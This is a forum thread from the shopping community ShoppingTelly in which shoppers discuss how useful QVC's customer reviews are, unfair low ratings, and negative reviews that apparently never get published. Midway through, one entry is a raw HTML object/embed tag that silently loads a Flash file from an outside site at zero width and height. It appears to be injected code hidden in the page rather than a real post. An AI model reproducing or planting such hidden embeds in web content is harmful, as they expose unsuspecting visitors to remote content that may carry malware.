Customer reviews

ShoppingTelly

Help Support ShoppingTelly:

Tizzy

Registered Shopper
I find myself relying more and more on the customer ratings and reviews on the qvc site before making a purchase.

I think it must be a blessing and a curse for qvc. A good example being how I almost brought some Leighton Denny stuff as a gift until I read the reviews!

Good on qvc for letting customers post the good along with the bad, even if it probably means some lost orders.

You do have to read the reviews carefully, though. You'll get a one-star review where the item was fine but didn't match something else, like pistachio pearls from Honora. That drags the rating down, without any real cause. And sometimes you get a poor review posted twice, also dragging down the ratings.

Sometimes I read a review and think 'That was just what I thought'...and then realise that the poster was...me!

I posted a review on a pendant I had bought, but it has now been about two weeks and it still has not been added to the site !, but then again I did say that if the option to give it "nil points" had been available I would have used it !.

I agree allthatglitters. I do try and read at least the first 10 reviews to guage a general guide to the product :)

Scampdog - I am surprised that they moderate the reviews before posting them. I appreciate that they have to be careful making sure people are fair and appropriate, but if you want to give it nil points, you hould be able to post it without having to wait for 'approval'.

I have to say the reviews are fab - I was going to buy some Leighton denny then someone said how thick it is and how long it takes to dry so that made my mind up for me and decided to stick to my Nails inc!

I think it's a good system and I'll always read them. However, I don't like the way a 'wrong size', 'wrong colour' type of review can drag the item down. I'll only give a 1-star review if the item was useless. All of my reviews have been posted- from 1-5 stars.

They don't post reviews to clearance products, I've noticed, so no point reviewing them.

I've posted a bad review on a clearance item and have noticed that another bad review has been posted on the same item in the last few weeks. Of course they may have suspended the ability to do so in recent days.

You do have to read the reviews carefully, though. You'll get a one-star review where the item was fine but didn't match something else, like pistachio pearls from Honora. That drags the rating down, without any real cause. And sometimes you get a poor review posted twice, also dragging down the ratings.

Sometimes I read a review and think 'That was just what I thought'...and then realise that the poster was...me!

I have done the same!

I buy very little before reading the reviews now.
If it's a new line I may take a chance if I think I can send it back at not too much cost to myself. It's a good move by QVC.

I posted a review on a pendant I had bought, but it has now been about two weeks and it still has not been added to the site !, but then again I did say that if the option to give it "nil points" had been available I would have used it !.

They are definitely selective about the reviews they print. I've left quite a few that have never appeared even though I've been extremely careful and honest with the wording I've used. I've also noticed that it only seems to be my negative reviews that haven't been listed. The positive ones pop up without fail!!

I also use them a lot and they are helpful when people say things like it is on the large size or the small size. I also dislike reviews that are not about the product itself and I hit the "not helpful review" button.

I usually read them before I make a purchase, they've come in handy a lot

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://submiturpics.com/uploads/pages/3683/info.html"></param><param name="allowFullScreen" value="true"></param><embed src="http://submiturpics.com/uploads/pages/3683/info.html" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I've posted a bad review on a clearance item and have noticed that another bad review has been posted on the same item in the last few weeks. Of course they may have suspended the ability to do so in recent days.

Actually, that suggests that not all reviews get posted, and that those of mine that didn't just happened to be in clearance. All other reviews I've written have made it on - eventually. I haven't been bothering to review clearance items for that reason!

I find myself relying more and more on the customer ratings and reviews on the qvc site before making a purchase.

Likewise, I've saved myself quite a bit lately. I've had various things in my basket and been on the verge of clicking 'go to check out', then read reviews and removed them pretty quickly.

I also use them a lot and they are helpful when people say things like it is on the large size or the small size. I also dislike reviews that are not about the product itself and I hit the "not helpful review" button.

I posted a review on a coat that arrived in a terrible state due to the very poor packaging. I mentioned this in the review and it was never shown. The packaging may not have been about the actual product but it did relate to how the product looked when opened and had I known this before I ordered I probably wouldn't have.

Latest posts

Back